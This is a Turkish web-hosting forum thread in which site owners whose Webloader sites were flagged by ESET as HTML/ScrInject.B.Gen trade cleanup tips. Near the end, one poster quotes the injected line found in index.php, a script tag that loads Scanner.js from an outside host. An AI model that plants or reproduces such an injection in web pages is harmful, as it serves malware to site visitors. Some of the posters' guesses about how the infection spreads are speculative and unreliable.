HTML/ScrInject.B.Gen Virus

Merhaba arkadaşlar , bir gece siteme giriş yaptığımda eset bu uyarıyı verdi , ben hemen panele girip tum ftpnin içini komple sildim derken diğer sitelerimede bulaştı,ve en sonunda servere bulaştı ve ana sunucuyada bağlanamadım.Komple format atmak zorunda kaldık.Butun hepsi 2-3 saat içinde gelişti.

Çok araştırma yaptım fakat elle tutulur bir bilgi alamadım.İframe virusu olacağınıda zannetmiyorum.Nasıl engel olunabilir , yardımcı olabilecek arkadaşlar varsa sevinirim.

Ekte nod32 nin uyarısı , script ise webloader patch2.



Buda direk link : http://img693.imageshack.us/img693/2...tbgenvirus.jpg

üstadlardan yardımcı olabilecek olan yokmu ? hiç rastlayan ..

Talihe bak şuan aynı durumdan mağdurum. Webloader scriptli 2 adet sitem var 2sinede girmiş. iframe virüsleri dosyaların isimlerine ''index'', ''default'' gibi kelimeler geçiyorsa bulaşıyor. Tüm index ve defaultları araştırdım sildim içindeki virüs kodlarını. Yalnız hala eset uyarı veriyor

Hala vardır, bazen sadece o dosyalara degil headere dahi bulasabiliyor bence tüm dosyalarınızı kontrol edin.

Ama demekki webloader patch2 de açık var. Silseniz ne olacak ?

HTML/ScrInject.B.Gen denen lanet banada bulastı temizleme yolu var mıdır

.js uzantılı bağlantılarıda kontrol edin

Arkadaşlar sorunu çözdüm bu virüs index.php nin en altına
<script type="text/javascript" src="http://roundstorm.com:8080/Scanner.js"></script>
<!--cbecbef796ef6bd546ae9e9a482580b1--> böyle bir kod koymuş. buda büyük ihtimalle güncellemelerden bulaştı...
wordpress.3.o da tahminimce bir açık var bu kodu bulun silin sorun ortadan kalkıyor.

şöyle bişi de var :
http://www.simtoalev.com/iframe-virusu/

en altta iframe virüsü harici bu konudan bahsetmiş